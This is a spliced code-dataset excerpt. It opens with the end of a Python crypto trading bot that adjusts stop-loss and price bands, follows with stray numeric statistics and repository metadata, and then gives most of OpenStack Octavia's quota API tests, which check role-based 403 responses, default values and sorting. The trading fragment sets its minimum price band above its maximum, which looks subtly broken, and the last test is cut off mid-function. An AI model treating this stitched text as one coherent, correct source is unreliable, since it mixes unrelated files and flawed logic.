            print(f"{txcolors.NOTICE}>> DYNAMICS_DOWN Changing STOP_LOSS: {settings_struct['STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} - TAKE_PROFIT: {settings_struct['TAKE_PROFIT']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} - TRAILING_STOP_LOSS: {settings_struct['TRAILING_STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} CIP:{settings_struct['CHANGE_IN_PRICE_MIN']:.4f}/{settings_struct['CHANGE_IN_PRICE_MAX']:.4f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} HTL: {settings_struct['HOLDING_TIME_LIMIT']:.2f} TD: {settings_struct['TIME_DIFFERENCE']} RI: {settings_struct['RECHECK_INTERVAL']} <<{txcolors.DEFAULT}")

        # Recompute price bands from observed market support/resistance
        # and from realized win/loss trade averages.
        if type == 'mrs_settings':
            if session_struct['prices_grabbed'] == True:
                settings_struct['CHANGE_IN_PRICE_MIN'] = session_struct['market_support'] + (session_struct['market_support'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
                settings_struct['CHANGE_IN_PRICE_MAX'] = session_struct['market_support'] - (session_struct['market_support'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
                settings_struct['TAKE_PROFIT'] = session_struct['market_resistance'] + (session_struct['market_resistance'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
            if session_struct['loss_trade_count'] > 1:
                trading_struct['trade_support'] = trading_struct['sum_lost_trades'] / session_struct['loss_trade_count']
            if session_struct['win_trade_count'] > 1:
                trading_struct['trade_resistance'] = trading_struct['sum_won_trades'] / session_struct['win_trade_count']
                settings_struct['TRAILING_STOP_LOSS'] = trading_struct['trade_resistance']

    # Holding-time limit is expressed in ms in live mode, seconds in test
    # mode — presumably to match the tick granularity; verify upstream.
    if not TEST_MODE: settings_struct['HOLDING_TIME_LIMIT'] = (settings_struct['TIME_DIFFERENCE'] * 60 * 1000) * HOLDING_INTERVAL_LIMIT
    if TEST_MODE: settings_struct['HOLDING_TIME_LIMIT'] = (settings_struct['TIME_DIFFERENCE'] * 60) * HOLDING_INTERVAL_LIMIT
| 75.379032
| 587
| 0.724083
| 1,146
| 9,347
| 5.407504
| 0.093368
| 0.230434
| 0.060836
| 0.10844
| 0.837018
| 0.80184
| 0.766823
| 0.755688
| 0.737938
| 0.711151
| 0
| 0.012119
| 0.161335
| 9,347
| 123
| 588
| 75.99187
| 0.778416
| 0.035519
| 0
| 0.10989
| 0
| 0.021978
| 0.385059
| 0.169164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010989
| false
| 0
| 0.087912
| 0
| 0.098901
| 0.043956
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c698e289463f6cdf147a642d0aa893ed2ea6449
| 41,801
|
py
|
Python
|
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestQuotas(base.BaseAPITest):
root_tag = 'quota'
root_tag_list = 'quotas'
root_tag_links = 'quotas_links'
def setUp(self):
super(TestQuotas, self).setUp()
conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
conf.config(
group="quotas",
default_load_balancer_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="quotas",
default_listener_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="quotas",
default_member_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
# We need to make sure unlimited gets tested each pass
conf.config(group="quotas",
default_pool_quota=constants.QUOTA_UNLIMITED)
conf.config(
group="quotas",
default_health_monitor_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
self.project_id = uuidutils.generate_uuid()
def _assert_quotas_equal(self, observed, expected=None):
if not expected:
expected = {'load_balancer':
CONF.quotas.default_load_balancer_quota,
'listener': CONF.quotas.default_listener_quota,
'pool': CONF.quotas.default_pool_quota,
'health_monitor':
CONF.quotas.default_health_monitor_quota,
'member': CONF.quotas.default_member_quota}
self.assertEqual(expected['load_balancer'], observed['load_balancer'])
self.assertEqual(expected['listener'], observed['listener'])
self.assertEqual(expected['pool'], observed['pool'])
self.assertEqual(expected['health_monitor'],
observed['health_monitor'])
self.assertEqual(expected['member'], observed['member'])
def test_get_all_quotas_no_quotas(self):
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
self.assertEqual({'quotas': [], 'quotas_links': []}, quota_list)
def test_get_all_quotas_with_quotas(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
'health_monitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
quota1['project_id'] = quota1['tenant_id'] = project_id1
quota2['project_id'] = quota2['tenant_id'] = project_id2
# Expected deprecated names until T
quota1['healthmonitor'] = quota1['health_monitor']
quota1['loadbalancer'] = quota1['load_balancer']
quota2['healthmonitor'] = quota2['health_monitor']
quota2['loadbalancer'] = quota2['load_balancer']
expected = {'quotas': [quota1, quota2], 'quotas_links': []}
self.assertEqual(expected, quota_list)
def test_deprecated_get_and_put_vars(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'loadbalancer': 50, 'listener': 50, 'pool': 50,
'healthmonitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
quota1['project_id'] = quota1['tenant_id'] = project_id1
quota2['project_id'] = quota2['tenant_id'] = project_id2
# Expected deprecated names until T
quota1['healthmonitor'] = quota1['health_monitor']
quota1['loadbalancer'] = quota1['load_balancer']
quota2['health_monitor'] = quota2['healthmonitor']
quota2['load_balancer'] = quota2['loadbalancer']
expected = {'quotas': [quota1, quota2], 'quotas_links': []}
self.assertEqual(expected, quota_list)
def test_get_all_not_Authorized(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
'health_monitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.QUOTAS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
    def test_get_all_not_Authorized_no_role(self):
        # A token carrying no roles at all must be denied the quota
        # listing, even for its own project.
        project_id1 = uuidutils.generate_uuid()
        quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
        quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
                  'pool': 30, 'health_monitor': 30, 'member': 30}
        body1 = {'quota': quota1}
        self.put(quota_path1, body1, status=202)
        self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
        # Save the configured auth strategy so it can be restored below.
        auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
        self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
        with mock.patch.object(octavia.common.context.Context, 'project_id',
                               project_id1):
            # Credentials with an empty 'roles' list and is_admin=False.
            override_credentials = {
                'service_user_id': None,
                'user_domain_id': None,
                'is_admin_project': True,
                'service_project_domain_id': None,
                'service_project_id': None,
                'roles': [],
                'user_id': None,
                'is_admin': False,
                'service_user_domain_id': None,
                'project_domain_id': None,
                'service_roles': [],
                'project_id': self.project_id}
            with mock.patch(
                    "oslo_context.context.RequestContext.to_policy_values",
                    return_value=override_credentials):
                response = self.get(self.QUOTAS_PATH, status=403)
        self.conf.config(group='api_settings', auth_strategy=auth_strategy)
        self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_not_Authorized_bogus_role(self):
    """Listing all quotas is rejected (403) for an unrecognized role."""
    project_id1 = uuidutils.generate_uuid()
    project_id2 = uuidutils.generate_uuid()
    quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
              'pool': 30, 'health_monitor': 30, 'member': 30}
    self.put(self.QUOTA_PATH.format(project_id=project_id1),
             {'quota': quota1}, status=202)
    quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
              'health_monitor': 50, 'member': 50}
    self.put(self.QUOTA_PATH.format(project_id=project_id2),
             {'quota': quota2}, status=202)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    # A role string that matches no load-balancer policy rule.
    bogus_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_bogus'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           uuidutils.generate_uuid()):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=bogus_creds):
            response = self.get(self.QUOTAS_PATH, status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_admin(self):
    """An admin listing of /quotas returns every project's quota."""
    expected_pairs = []
    for n in (1, 2, 3):
        quota = self.create_quota(
            project_id=uuidutils.generate_uuid(), lb_quota=n,
            member_quota=n).get(self.root_tag)
        expected_pairs.append(
            (quota.get('load_balancer'), quota.get('member')))
    quotas = self.get(self.QUOTAS_PATH).json.get(self.root_tag_list)
    self.assertEqual(3, len(quotas))
    observed_pairs = [(q.get('load_balancer'), q.get('member'))
                      for q in quotas]
    for pair in expected_pairs:
        self.assertIn(pair, observed_pairs)
def test_get_all_non_admin_global_observer(self):
    """The global-observer role may list quotas across all projects."""
    expected_pairs = []
    for n in (1, 2, 3):
        quota = self.create_quota(
            project_id=uuidutils.generate_uuid(), lb_quota=n,
            member_quota=n).get(self.root_tag)
        expected_pairs.append(
            (quota.get('load_balancer'), quota.get('member')))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    observer_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_global_observer'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=observer_creds):
            quotas = self.get(
                self.QUOTAS_PATH).json.get(self.root_tag_list)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(3, len(quotas))
    observed_pairs = [(q.get('load_balancer'), q.get('member'))
                      for q in quotas]
    for pair in expected_pairs:
        self.assertIn(pair, observed_pairs)
def test_get_all_quota_admin(self):
    """The quota-admin role may list quotas across all projects."""
    expected_pairs = []
    for n in (1, 2, 3):
        quota = self.create_quota(
            project_id=uuidutils.generate_uuid(), lb_quota=n,
            member_quota=n).get(self.root_tag)
        expected_pairs.append(
            (quota.get('load_balancer'), quota.get('member')))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    admin_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_quota_admin'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=admin_creds):
            quotas = self.get(
                self.QUOTAS_PATH).json.get(self.root_tag_list)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(3, len(quotas))
    observed_pairs = [(q.get('load_balancer'), q.get('member'))
                      for q in quotas]
    for pair in expected_pairs:
        self.assertIn(pair, observed_pairs)
def test_get_all_non_admin(self):
    """A plain member listing /quotas sees only its own project's quota."""
    self.create_quota(
        project_id=uuidutils.generate_uuid(), lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.create_quota(
        project_id=uuidutils.generate_uuid(), lb_quota=2, member_quota=2
    ).get(self.root_tag)
    member_project = uuidutils.generate_uuid()
    own_quota = self.create_quota(
        project_id=member_project, lb_quota=3, member_quota=3
    ).get(self.root_tag)
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings',
                     auth_strategy=constants.KEYSTONE)
    member_creds = {
        'user_id': None,
        'project_id': member_project,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_member'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           member_project):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=member_creds):
            quotas = self.get(
                self.QUOTAS_PATH).json.get(self.root_tag_list)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(1, len(quotas))
    observed_pairs = [(q.get('load_balancer'), q.get('member'))
                      for q in quotas]
    self.assertIn((own_quota.get('load_balancer'), own_quota.get('member')),
                  observed_pairs)
def test_get_all_non_admin_observer(self):
    """A project observer listing /quotas sees only its own quota."""
    self.create_quota(
        project_id=uuidutils.generate_uuid(), lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.create_quota(
        project_id=uuidutils.generate_uuid(), lb_quota=2, member_quota=2
    ).get(self.root_tag)
    observer_project = uuidutils.generate_uuid()
    own_quota = self.create_quota(
        project_id=observer_project, lb_quota=3, member_quota=3
    ).get(self.root_tag)
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings',
                     auth_strategy=constants.KEYSTONE)
    observer_creds = {
        'user_id': None,
        'project_id': observer_project,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_observer'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           observer_project):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=observer_creds):
            quotas = self.get(
                self.QUOTAS_PATH).json.get(self.root_tag_list)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(1, len(quotas))
    observed_pairs = [(q.get('load_balancer'), q.get('member'))
                      for q in quotas]
    self.assertIn((own_quota.get('load_balancer'), own_quota.get('member')),
                  observed_pairs)
def test_get_by_project_id(self):
    """GET /quotas/{project_id} returns the quota created for that project."""
    project_ids = [uuidutils.generate_uuid() for _ in range(2)]
    created = [
        self.create_quota(project_id=pid, lb_quota=n, member_quota=n
                          ).get(self.root_tag)
        for n, pid in enumerate(project_ids, start=1)]
    for pid, expected in zip(project_ids, created):
        fetched = self.get(
            self.QUOTA_PATH.format(project_id=pid)
        ).json.get(self.root_tag)
        self._assert_quotas_equal(fetched, expected)
def test_get_Authorized_member(self):
    """The member role may GET its own project's quota."""
    self._test_get_Authorized('load-balancer_member')
def test_get_Authorized_observer(self):
    """The observer role may GET its own project's quota."""
    self._test_get_Authorized('load-balancer_observer')
def test_get_Authorized_global_observer(self):
    """The global-observer role may GET a project's quota."""
    self._test_get_Authorized('load-balancer_global_observer')
def test_get_Authorized_quota_admin(self):
    """The quota-admin role may GET a project's quota."""
    self._test_get_Authorized('load-balancer_quota_admin')
def _test_get_Authorized(self, role):
    """Shared body: GET the project's quota succeeds under ``role``.

    :param role: the keystone role string to present in the request
                 credentials.
    """
    owner_project = uuidutils.generate_uuid()
    created = self.create_quota(
        project_id=owner_project, lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    role_creds = {
        'user_id': None,
        'project_id': owner_project,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': [role],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           owner_project):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=role_creds):
            fetched = self.get(
                self.QUOTA_PATH.format(project_id=owner_project)
            ).json.get(self.root_tag)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self._assert_quotas_equal(fetched, created)
def test_get_not_Authorized(self):
    """GET on another project's quota is rejected with 403."""
    owner_project = uuidutils.generate_uuid()
    self.create_quota(
        project_id=owner_project, lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    # Request context belongs to a different (random) project.
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           uuidutils.generate_uuid()):
        response = self.get(
            self.QUOTA_PATH.format(project_id=owner_project), status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_not_Authorized_bogus_role(self):
    """GET a project's quota is rejected (403) for an unrecognized role."""
    owner_project = uuidutils.generate_uuid()
    self.create_quota(
        project_id=owner_project, lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    bogus_creds = {
        'user_id': None,
        'project_id': owner_project,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer:bogus'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           owner_project):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=bogus_creds):
            response = self.get(
                self.QUOTA_PATH.format(project_id=owner_project),
                status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_not_Authorized_no_role(self):
    """GET a project's quota is rejected (403) when no roles are present."""
    owner_project = uuidutils.generate_uuid()
    self.create_quota(
        project_id=owner_project, lb_quota=1, member_quota=1
    ).get(self.root_tag)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    no_role_creds = {
        'user_id': None,
        'project_id': owner_project,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': [],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           owner_project):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=no_role_creds):
            response = self.get(
                self.QUOTA_PATH.format(project_id=owner_project),
                status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_sorted(self):
    """Ascending and descending sorts return mirror-image orderings."""
    for lb_count, member_count in ((3, 8), (2, 10), (1, 9)):
        self.create_quota(
            project_id=uuidutils.generate_uuid(), lb_quota=lb_count,
            member_quota=member_count).get(self.root_tag)
    quotas_desc = self.get(
        self.QUOTAS_PATH, params={'sort': 'load_balancer:desc'}
    ).json.get(self.root_tag_list)
    quotas_asc = self.get(
        self.QUOTAS_PATH, params={'sort': 'load_balancer:asc'}
    ).json.get(self.root_tag_list)
    self.assertEqual(3, len(quotas_desc))
    self.assertEqual(3, len(quotas_asc))
    desc_pairs = [(q.get('load_balancer'), q.get('member'))
                  for q in quotas_desc]
    asc_pairs = [(q.get('load_balancer'), q.get('member'))
                 for q in quotas_asc]
    # Reversing one ordering must reproduce the other exactly.
    self.assertEqual(asc_pairs, list(reversed(desc_pairs)))
def test_get_all_limited(self):
    """Pagination over /quotas: limit/marker yield next/previous links.

    Currently skipped; the body documents the intended behavior once
    quota pagination is implemented.
    """
    self.skipTest("No idea how this should work yet")
    # TODO(rm_work): Figure out how to make this ... work
    project1_id = uuidutils.generate_uuid()
    project2_id = uuidutils.generate_uuid()
    project3_id = uuidutils.generate_uuid()
    self.create_quota(
        project_id=project1_id, lb_quota=3, member_quota=8
    ).get(self.root_tag)
    self.create_quota(
        project_id=project2_id, lb_quota=2, member_quota=10
    ).get(self.root_tag)
    self.create_quota(
        project_id=project3_id, lb_quota=1, member_quota=9
    ).get(self.root_tag)
    # First two -- should have 'next' link
    first_two = self.get(self.QUOTAS_PATH, params={'limit': 2}).json
    objs = first_two[self.root_tag_list]
    links = first_two[self.root_tag_links]
    self.assertEqual(2, len(objs))
    self.assertEqual(1, len(links))
    self.assertEqual('next', links[0]['rel'])
    # Third + off the end -- should have previous link
    third = self.get(self.QUOTAS_PATH, params={
        'limit': 2,
        'marker': first_two[self.root_tag_list][1]['id']}).json
    objs = third[self.root_tag_list]
    links = third[self.root_tag_links]
    self.assertEqual(1, len(objs))
    self.assertEqual(1, len(links))
    self.assertEqual('previous', links[0]['rel'])
    # Middle -- should have both links
    middle = self.get(self.QUOTAS_PATH, params={
        'limit': 1,
        'marker': first_two[self.root_tag_list][0]['id']}).json
    objs = middle[self.root_tag_list]
    links = middle[self.root_tag_links]
    self.assertEqual(1, len(objs))
    self.assertEqual(2, len(links))
    # assertItemsEqual was removed in Python 3 unittest; assertCountEqual
    # is the order-insensitive equivalent.
    self.assertCountEqual(['previous', 'next'],
                          [link['rel'] for link in links])
def test_get_default_quotas(self):
    """GET the default-quota resource and compare with configured defaults."""
    default_path = self.QUOTA_DEFAULT_PATH.format(
        project_id=self.project_id)
    response = self.get(default_path)
    self._assert_quotas_equal(response.json['quota'])
def test_get_default_quotas_Authorized(self):
    """A member role may read its own project's default quotas."""
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    member_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_member'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=member_creds):
            response = self.get(self.QUOTA_DEFAULT_PATH.format(
                project_id=self.project_id))
            self._assert_quotas_equal(response.json['quota'])
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
def test_get_default_quotas_not_Authorized(self):
    """Reading another project's default quotas is rejected with 403."""
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    # Context project differs from the project in the URL.
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           uuidutils.generate_uuid()):
        response = self.get(self.QUOTA_DEFAULT_PATH.format(
            project_id=self.project_id), status=403)
        self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
def test_custom_quotas(self):
    """PUT a full custom quota set, then read it back unchanged."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    custom = {'load_balancer': 30, 'listener': 30, 'pool': 30,
              'health_monitor': 30, 'member': 30}
    self.put(quota_path, {'quota': custom}, status=202)
    fetched = self.get(quota_path).json
    self._assert_quotas_equal(fetched['quota'], expected=custom)
def test_custom_quotas_quota_admin(self):
    """The quota-admin role may PUT custom quotas for a project."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    custom = {'load_balancer': 30, 'listener': 30, 'pool': 30,
              'health_monitor': 30, 'member': 30}
    body = {'quota': custom}
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    admin_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_quota_admin'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=admin_creds):
            self.put(quota_path, body, status=202)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    # Verify outside the mocked context that the update stuck.
    fetched = self.get(quota_path).json
    self._assert_quotas_equal(fetched['quota'], expected=custom)
def test_custom_quotas_not_Authorized_member(self):
    """A plain member may not PUT custom quotas (403)."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
                      'health_monitor': 30, 'member': 30}}
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    member_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_member'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=member_creds):
            response = self.put(quota_path, body, status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_custom_partial_quotas(self):
    """An explicit None in a PUT falls back to the configured default."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    submitted = {'load_balancer': 30, 'listener': None, 'pool': 30,
                 'health_monitor': 30, 'member': 30}
    # The null listener value should be replaced by the config default.
    expected = dict(submitted,
                    listener=CONF.quotas.default_listener_quota)
    self.put(quota_path, {'quota': submitted}, status=202)
    fetched = self.get(quota_path).json
